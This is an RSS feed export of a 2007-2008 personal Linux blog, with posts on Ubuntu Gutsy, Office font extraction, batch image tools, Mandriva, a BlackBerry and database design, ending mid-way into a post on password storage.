<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-4231410113405179901</atom:id><lastBuildDate>Sun, 27 Nov 2011 23:18:30 +0000</lastBuildDate><category>Ubuntu</category><category>Blackberry</category><category>Virtualization</category><category>General</category><category>Security</category><category>Mandriva</category><title>Tuxero</title><description /><link>http://en.tuxero.com/</link><managingEditor>noreply@blogger.com (Sebastián Stucke)</managingEditor><generator>Blogger</generator><openSearch:totalResults>21</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/TuxeroEn" /><feedburner:info uri="tuxeroen" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-7157148032451913385</guid><pubDate>Mon, 18 Feb 2008 20:41:00 +0000</pubDate><atom:updated>2008-02-18T18:46:03.731-02:00</atom:updated><title>Avant Window Navigator in Ubuntu Gutsy</title><description>Ok, this is all well known, but for those who doesn't know it, the AWN (Avant Window Navigator) is an equivalent to the navigation bar of Mac's &lt;a href="http://www.apple.com/es/macosx/features/desktop.html"&gt;Leopard&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://kushelmex.wordpress.com/2007/11/27/awn-en-ubuntu-gutsy/"&gt;Here&lt;/a&gt; are the installation instructions.&lt;br /&gt;&lt;br /&gt;I must say it is spectacular. You should try it.&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;Versión en español:&lt;br /&gt;&lt;a href="http://es.tuxero.com/2008/02/avant-window-navigator-en-ubuntu-gutsy.html"&gt;http://es.tuxero.com/2008/02/avant-window-navigator-en-ubuntu-gutsy.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-7157148032451913385?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/zu-STzpUdZQ/avant-window-navigator-in-ubuntu-gutsy.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2008/02/avant-window-navigator-in-ubuntu-gutsy.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-8344986471451556539</guid><pubDate>Thu, 31 Jan 2008 14:40:00 +0000</pubDate><atom:updated>2008-01-31T12:43:14.405-02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>How to get Office 2007 fonts in Ubuntu</title><description>Do you need the new fonts in your ubuntu?&lt;br /&gt;Follow this little tutorial, and you'll get it!&lt;br /&gt;&lt;br /&gt;1) Install cabextract. Run:&lt;br /&gt;&lt;blockquote&gt;sudo apt-get install cabextract&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;2) Download &lt;a href="http://www.microsoft.com/downloads/details.aspx?familyid=048DC840-14E1-467D-8DCA-19D2A8FD7485&amp;displaylang=en"&gt;PowerPoint Viewer 2007 &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3) Change directory to your download location.&lt;br /&gt;&lt;br /&gt;4) Decompress the exe file. Run: &lt;br /&gt;&lt;blockquote&gt;cabextract -F ppviewer.cab PowerPointViewer.exe&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;5) Extract the fonts. Run:&lt;br /&gt;&lt;blockquote&gt;cabextract -F '*.TTF' ppviewer.cab&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;6) Copy the fonts to the fonts directory. Run:&lt;br /&gt;&lt;blockquote&gt;sudo mkdir /usr/share/fonts/vista&lt;br /&gt;sudo mv *TTF /usr/share/fonts/vista&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;7) Update the fonts cache. Run:&lt;br /&gt;&lt;blockquote&gt;fc-cache -fv&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Seen at &lt;a href="http://www.oooninja.com/2008/01/calibri-linux-vista-fonts-download.html"&gt;http://www.oooninja.com/2008/01/calibri-linux-vista-fonts-download.html&lt;/a&gt;&lt;br /&gt;Through &lt;a href="http://www.desktoplinux.com/news/NS7975322673.html"&gt;http://www.desktoplinux.com/news/NS7975322673.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;(See copyright conditions at Microsoft's site)&lt;br /&gt;&lt;br /&gt;Versión en español:&lt;br /&gt;&lt;a href="http://es.tuxero.com/2008/01/cmo-obtener-las-tipografas-de-office.html"&gt;http://es.tuxero.com/2008/01/cmo-obtener-las-tipografas-de-office.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-8344986471451556539?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/cI9NeMHlgdI/how-to-get-office-2007-fonts-in-ubuntu.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>3</thr:total><feedburner:origLink>http://en.tuxero.com/2008/01/how-to-get-office-2007-fonts-in-ubuntu.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-5110139716781689009</guid><pubDate>Tue, 29 Jan 2008 19:31:00 +0000</pubDate><atom:updated>2008-01-29T17:38:52.519-02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>Rotate and resize several images at once with Ubuntu</title><description>Recently I wanted to copy several images from my PC to my blackberr.&lt;br /&gt;Since the blackberry's screen has 320x240, it doesn't make sense to copy the images in full size due to memory space and the time it takes to show each image.&lt;br /&gt;I found a good utility to do this for me, without having to open one by one the images with GIMP.&lt;br /&gt;We run the following command (it may be necessary to restart the session after the installation):&lt;br /&gt;&lt;blockquote&gt;sudo apt-get install nautilus-image-converter&lt;/blockquote&gt;&lt;br /&gt;After this, you can select multiple images and with secondary button the following choices appear: 'Resize images' and 'Rotate images'.&lt;br /&gt;A friend also suggested me to see a nautilus script found here: &lt;a href="http://www.creationgif.com/debian/nis/"&gt;http://www.creationgif.com/debian/nis/&lt;/a&gt;&lt;br /&gt;Since the previous functions pretty well, I didn't install the script. If anyone installs it, please tell me how it goes.&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;Sources:&lt;br /&gt;&lt;a href="http://www.taringa.net/posts/info/1041480/Cambiar-tama%C3%B1o-a-varias-imagenes-en-Ubuntu_Linux.html"&gt;http://www.taringa.net/posts/info/1041480/Cambiar-tama%C3%B1o-a-varias-imagenes-en-Ubuntu_Linux.html&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.taringa.net/posts/info/960673/Scripts-para-nautilus-en-Ubuntu---Linux---Mini-guia.html"&gt;http://www.taringa.net/posts/info/960673/Scripts-para-nautilus-en-Ubuntu---Linux---Mini-guia.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Versión en español:&lt;br /&gt;&lt;a href="http://es.tuxero.com/2008/01/rotar-y-cambiar-el-tamao-varias.html"&gt;http://es.tuxero.com/2008/01/rotar-y-cambiar-el-tamao-varias.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-5110139716781689009?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/gMLdDTWeXmw/rotate-and-resize-several-images-at.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2008/01/rotate-and-resize-several-images-at.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-5680457933686785564</guid><pubDate>Wed, 23 Jan 2008 13:29:00 +0000</pubDate><atom:updated>2008-01-29T17:38:19.311-02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Mandriva</category><title>Mandriva Powerpack 2008</title><description>I installed the Mandriva in my notebook, a Sony Vaio VGN-N350FE.&lt;br /&gt;As previous installations of Mandriva, everything was very easy, including the disk partitioning (which I always do a non standard partitioning). Unlike Ubuntu, it allows you to choose the packages to be installed, and it lets you copy the installation disk to the hard drive so you can later add or remove packages more easily.&lt;br /&gt;The problem I had so far was that I tried to run the vmware player, and IT DID NOT WORK. This really sucks. It looks like the Mandriva folks 'forgot' to test that the program works. I tried to execute the player's configuration utility, and it detected that the kernel source were not installed. I installed them and re-run the configuration utility: it threw a bizarre error, that I'd like to forget ;-)&lt;br /&gt;Finally, I used the vmware server 1.0.4 installer, and I could install it correctly (even though in the end it gave me a warning saying that the 'vmware-cmd' utility wouldn't work).&lt;br /&gt;Once the system was installed, I tried to open Second Life, and it gave me an error saying 'Window creation error', and that was it.&lt;br /&gt;I still don't know if I'm going to install Mandriva in my main computer. I'll test it for a few days, and then, we'll see.&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;Versión en español:&lt;br /&gt;&lt;a href="http://es.tuxero.com/2008/01/mandriva-powerpack-2008.html"&gt;http://es.tuxero.com/2008/01/mandriva-powerpack-2008.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-5680457933686785564?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/jz-4nhCQdPQ/mandriva-powerpack-2008.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2008/01/mandriva-powerpack-2008.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-273493246312829676</guid><pubDate>Fri, 28 Dec 2007 20:07:00 +0000</pubDate><atom:updated>2008-01-29T17:37:42.531-02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>How to rename the extension of multiple files in ubuntu</title><description>Recently I needed to rename the extension of many files in one step.&lt;br /&gt;The 'mv' command didn't work, and I tried with different alternatives, such as using 'for' commands.&lt;br /&gt;Finally, I found that Debian based distributions have the 'rename' command.&lt;br /&gt;Following, the syntax for renaming '.jpg' files to '.jpeg'.&lt;br /&gt;&lt;br /&gt;rename 's/\.jpg/.jpeg/' *.jpg&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;Versión en español:&lt;br /&gt;&lt;a href="http://es.tuxero.com/2007/12/cmo-renombrar-la-extensin-de-mltiples.html"&gt;http://es.tuxero.com/2007/12/cmo-renombrar-la-extensin-de-mltiples.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-273493246312829676?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/Y0Y7xpB7HS8/how-to-rename-extension-of-multiple.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/12/how-to-rename-extension-of-multiple.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-7714690996297385923</guid><pubDate>Thu, 22 Nov 2007 21:12:00 +0000</pubDate><atom:updated>2008-01-29T17:39:32.193-02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">General</category><title>Closed source</title><description>I'm working on a project in which I have to connect to a database used by a small ERP software.&lt;br /&gt;The database runs over a SQL Server 2005. "No problem!" I thought at all times, because I've been working with SQL Server since its 7.0 release (and I use SQL Server 2005 practically since it was available).&lt;br /&gt;How disappointed I was when I found that the table names were TRAxxx, SUAxxx, STAxxx, etc (where xxx is a number). There are several prefixes, and hundreds of tables for each prefix. I've done reverse engineering in the past, and it doesn't scare me at all (as a matter of fact, I quickly found the tables I need).&lt;br /&gt;I even found that in the tables I examined there are NO enforced relationships. A note to the developers: please read something on referential integrity.&lt;br /&gt;&lt;br /&gt;I think there are two main reasons that causes someone to name tables incorrectly:&lt;br /&gt;- Bad database design.&lt;br /&gt;- An attempt to hide database contents.&lt;br /&gt;&lt;br /&gt;Without going to the extreme of proposing these people to release the source code, I believe that there are intermediate points. The companies that buy software licenses should own the information, and this includes the possibility of using the data as they see fit.&lt;br /&gt;&lt;br /&gt;Is regrettable what I found, in terms of database design, and regarding their cryptic way of naming tables.&lt;br /&gt;&lt;br /&gt;I think that when we develop software, our work structure should be clear and transparent. We must give our customers the freedom of choice. We already charged for our work, we do not need to enslave our customers. Let them choose us for our solution's quality rather for lack of choice.&lt;br /&gt;&lt;br /&gt;Versión en español:&lt;br /&gt;&lt;a href="http://es.tuxero.com/2007/11/closed-source.html"&gt;http://es.tuxero.com/2007/11/closed-source.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-7714690996297385923?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/TVRqwF2Cb0M/closed-source.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/11/closed-source.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-2088194658702248717</guid><pubDate>Fri, 26 Oct 2007 15:20:00 +0000</pubDate><atom:updated>2007-10-26T12:24:04.230-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Blackberry</category><title>Blackberry 8800 acquired</title><description>I love technology since I was a kid, but lately I am getting irritated with the technological excess.&lt;br /&gt;At moments I feel over-connected. Email accounts, IM, cell phone, SMS, everything demanding my attention. When the idea of having a blackberry came out for work reasons, I really did not want to do it. It felt too much.&lt;br /&gt;Work comes first, so I finally acquired a Blackberry 8800.&lt;br /&gt;&lt;br /&gt;How wrong I was.&lt;br /&gt;&lt;br /&gt;Now that I have it, I wonder how did I manage to live before without it. Beyond that "it's a cool gadget", its utility is incredible.&lt;br /&gt;The graphical interface is not that pretty, functionality is maximized, leaving aside the design. I don't complain, but I think they could have done it 'just a little bit' more cute.&lt;br /&gt;&lt;br /&gt;I think that the best thing I have to say about it is that before I worried about having to check my mail. Many times working in the street, visiting clients, without time to go somewhere with WiFi (the are rare in my city) and open my notebook. That anxiety disappeared. Emails I care about arrive to my BB, with the push-mail technology. It's fabulous, I feel archaic for having waited so long to have one!&lt;br /&gt;&lt;br /&gt;Well, I have to end now, because I have some emails to reply in the BB :-D&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;Version en español&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/10/blackberry-8800-adquirido.html"&gt;http://www.tuxero.com/2007/10/blackberry-8800-adquirido.html&lt;/a&gt;&lt;br /&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/blackberry" rel="tag"&gt;blackberry&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-2088194658702248717?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/5qcJ7TPdgqc/blackberry-8800-acquired.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/10/blackberry-8800-acquired.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-561175352155853998</guid><pubDate>Sun, 14 Oct 2007 13:54:00 +0000</pubDate><atom:updated>2007-10-14T10:56:44.802-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>Using Ubuntu Gutsy Beta</title><description>I'm still using Ubuntu Gutsy Beta, and with much pleasure I discovered that it detects and uses the built in Memory Stick card reader that comes with my Sony Vaio VGN-N350FE. It must say that previous versions did not detect the card reader.&lt;br /&gt;The system is very stable. The only problem is that eventually I have trouble when shutting down the notebook.&lt;br /&gt;I installed the 'Advanced Desktop Effects Settings' for configuring Compiz Fusion, and it is a very nice way to waste time. It has many effects, some of them very amusing. The previous version didn't have a so detailed configuration utility. It's very cool to completely personalize the desktop effects.&lt;br /&gt;I still have pending to test the virtualization, but I probably wait for the final version to be released (it's around the corner!).&lt;br /&gt;In short, it seems that it will be a very good version of Ubuntu, and the truth is that they have widely extended compatibility with notebooks.&lt;br /&gt;&lt;br /&gt;Versión en español:&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/10/usando-ubuntu-gutsy-beta.html"&gt;http://www.tuxero.com/2007/10/usando-ubuntu-gutsy-beta.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/ubuntu" rel="tag"&gt;ubuntu&lt;/a&gt; &lt;a href="http://technorati.com/tag/gutsy" rel="tag"&gt;gutsy&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-561175352155853998?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/gDQQQGaqZLY/using-ubuntu-gutsy-beta.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/10/using-ubuntu-gutsy-beta.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-8700061133039305664</guid><pubDate>Mon, 01 Oct 2007 20:55:00 +0000</pubDate><atom:updated>2007-10-01T18:11:25.849-03:00</atom:updated><title>Testing Ubuntu Gutsy Beta - Screenshots</title><description>I installed Ubuntu Gutsy Gibbon Beta in my Sony Vaio VGN-N350FE for testing.&lt;br /&gt;The installation went almost without problems. The only thing is that at a moment it threw an error saying that the partition for importing settings was already mounted, even though I indicated not to perform such importation. I clicked the 'Continue' button, and the installation completed correctly.&lt;br /&gt;I find the system very stable. The brightness control works correctly, which means they fixed it (it didn't work in previous versions). Suspension and hibernation also work, though, after trying a few times, I had trouble to turn the machine off, I don't know if it is because of this, or for some other reason.&lt;br /&gt;So far, I tested the following things:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Screen configuration&lt;/span&gt;&lt;br /&gt;Multiple monitors support is now much more intuitive, editing the /etc/X11/xorg.conf file (which could be cryptic for beginners) is no longer needed.&lt;br /&gt;As you can see in the screenshot, the configuration utility is very intuitive.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_MfMe7wTfcFE/RwEWhgFQGaI/AAAAAAAABGc/IVYzSKG3uAs/s1600-h/video-res.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_MfMe7wTfcFE/RwEWhgFQGaI/AAAAAAAABGc/IVYzSKG3uAs/s400/video-res.png" alt="" id="BLOGGER_PHOTO_ID_5116395416473049506" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Printers configuration&lt;/span&gt;&lt;br /&gt;This version includes automatic printer configuration, when they are plugged in. I couldn't test this function, but I have a HP 2600n network printer, and to add it was really simple.&lt;br /&gt;I opened the printers configuration utility.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_MfMe7wTfcFE/RwEWtgFQGbI/AAAAAAAABGk/7MBgly4n1Ws/s1600-h/printer1.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_MfMe7wTfcFE/RwEWtgFQGbI/AAAAAAAABGk/7MBgly4n1Ws/s400/printer1.png" alt="" id="BLOGGER_PHOTO_ID_5116395622631479730" border="0" /&gt;&lt;/a&gt;In this application, I clicked the 'New printer' button. I entered the appropriate values for my printer, and the clicked the 'Forward' button.&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_MfMe7wTfcFE/RwEXEwFQGcI/AAAAAAAABGs/VF_LbW6ZuEA/s1600-h/printer2.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_MfMe7wTfcFE/RwEXEwFQGcI/AAAAAAAABGs/VF_LbW6ZuEA/s400/printer2.png" alt="" id="BLOGGER_PHOTO_ID_5116396022063438274" border="0" /&gt;&lt;/a&gt;This opened the drivers selection window. I chose 'HP', and then 'Color Laserjet 2600n'.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_MfMe7wTfcFE/RwEXUAFQGdI/AAAAAAAABG0/lBiQ76eHmzQ/s1600-h/printer3.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_MfMe7wTfcFE/RwEXUAFQGdI/AAAAAAAABG0/lBiQ76eHmzQ/s400/printer3.png" alt="" id="BLOGGER_PHOTO_ID_5116396284056443346" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_MfMe7wTfcFE/RwFbUwFQGeI/AAAAAAAABG8/DMdK37LIBt0/s1600-h/printer4.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_MfMe7wTfcFE/RwFbUwFQGeI/AAAAAAAABG8/DMdK37LIBt0/s400/printer4.png" alt="" id="BLOGGER_PHOTO_ID_5116471063732034018" border="0" /&gt;&lt;/a&gt;Then it asked me to enter the printer name. After doing so, I clicked the button 'Apply'.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_MfMe7wTfcFE/RwFbgAFQGfI/AAAAAAAABHE/IWhg3DOLrs0/s1600-h/printer5.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_MfMe7wTfcFE/RwFbgAFQGfI/AAAAAAAABHE/IWhg3DOLrs0/s400/printer5.png" alt="" id="BLOGGER_PHOTO_ID_5116471257005562354" border="0" /&gt;&lt;/a&gt;Done! The printer was correctly installed. The test page was printed correctly.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_MfMe7wTfcFE/RwFboQFQGgI/AAAAAAAABHM/sfDc2tn5SQA/s1600-h/Printer6.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_MfMe7wTfcFE/RwFboQFQGgI/AAAAAAAABHM/sfDc2tn5SQA/s400/Printer6.png" alt="" id="BLOGGER_PHOTO_ID_5116471398739483138" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Video codecs&lt;/span&gt;&lt;br /&gt;I tried to play a video file, and it said that video codecs were not available.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_MfMe7wTfcFE/RwFbxwFQGhI/AAAAAAAABHU/r_JneEtamvk/s1600-h/video1.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_MfMe7wTfcFE/RwFbxwFQGhI/AAAAAAAABHU/r_JneEtamvk/s400/video1.png" alt="" id="BLOGGER_PHOTO_ID_5116471561948240402" border="0" /&gt;&lt;/a&gt;I clicked the 'Search' button, and it found the appropriate codecs.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_MfMe7wTfcFE/RwFb6wFQGiI/AAAAAAAABHc/zY-T3HVhD7c/s1600-h/video2.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_MfMe7wTfcFE/RwFb6wFQGiI/AAAAAAAABHc/zY-T3HVhD7c/s400/video2.png" alt="" id="BLOGGER_PHOTO_ID_5116471716567063074" border="0" /&gt;&lt;/a&gt; After selecting them, it prompted for confirmation for installing restricted software.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_MfMe7wTfcFE/RwFcGQFQGjI/AAAAAAAABHk/COes6MiEgfc/s1600-h/video3.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_MfMe7wTfcFE/RwFcGQFQGjI/AAAAAAAABHk/COes6MiEgfc/s400/video3.png" alt="" id="BLOGGER_PHOTO_ID_5116471914135558706" border="0" /&gt;&lt;/a&gt;After this, it was correctly installed.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;In short&lt;/span&gt;&lt;br /&gt;So far, it is a really stable system, it is more compatible with my notebook, and easier to use. As I continue to test it, I'm going to keep posting testing results.&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/ubuntu" rel="tag"&gt;ubuntu&lt;/a&gt; &lt;a href="http://technorati.com/tag/gutsy" rel="tag"&gt;gutsy&lt;/a&gt; &lt;a href="http://technorati.com/tag/sony+vaio" rel="tag"&gt;sony vaio&lt;/a&gt; &lt;a href="http://technorati.com/tag/hp+2600" rel="tag"&gt;hp 2600&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Version en español:&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/10/probando-ubuntu-gutsy-beta.html"&gt;http://www.tuxero.com/2007/10/probando-ubuntu-gutsy-beta.html&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-8700061133039305664?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/jZSkqcem1U8/testing-ubuntu-gutsy-beta-screenshots.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://bp1.blogger.com/_MfMe7wTfcFE/RwEWhgFQGaI/AAAAAAAABGc/IVYzSKG3uAs/s72-c/video-res.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/10/testing-ubuntu-gutsy-beta-screenshots.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-8524193498351527873</guid><pubDate>Fri, 28 Sep 2007 22:07:00 +0000</pubDate><atom:updated>2007-09-28T19:09:15.453-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>Ubuntu Gutsy Gibbon (7.10) Beta available</title><description>Canonical made public a new beta version of Ubuntu Gutsy Gibbon.&lt;br /&gt;I'm downloading the version, so when I test it, I'm going to comment how it went. It's a expected version, because it includes better support for notebooks, graphical configuration tool for X, better support for dual monitors, better support for restricted drivers, compiz fusion, Apparmor, NTFS writing support, automatic printer configuration (I want to see this!), desktop search, Gnome 2.20 and a long etcetera.&lt;br /&gt;Link: &lt;a href="http://www.ubuntu.com/testing/gutsybeta"&gt;http://www.ubuntu.com/testing/gutsybeta&lt;/a&gt;&lt;br /&gt;Cheers!&lt;br /&gt;Versión en español:&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/09/ubuntu-gutsy-gibbon-710-beta-est.html"&gt;http://www.tuxero.com/2007/09/ubuntu-gutsy-gibbon-710-beta-est.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-8524193498351527873?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/BYKuU-t9KzE/ubuntu-gutsy-gibbon-710-beta-available.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/09/ubuntu-gutsy-gibbon-710-beta-available.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-4416264446588403419</guid><pubDate>Fri, 21 Sep 2007 14:25:00 +0000</pubDate><atom:updated>2007-09-21T11:27:50.125-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><title>How to store passwords in a database</title><description>Often we write applications that must perform users and permissions validations. In these cases it is rather common that the developers include fields like 'User' and 'Password' in the users table. Also happens that the passwords are stored in 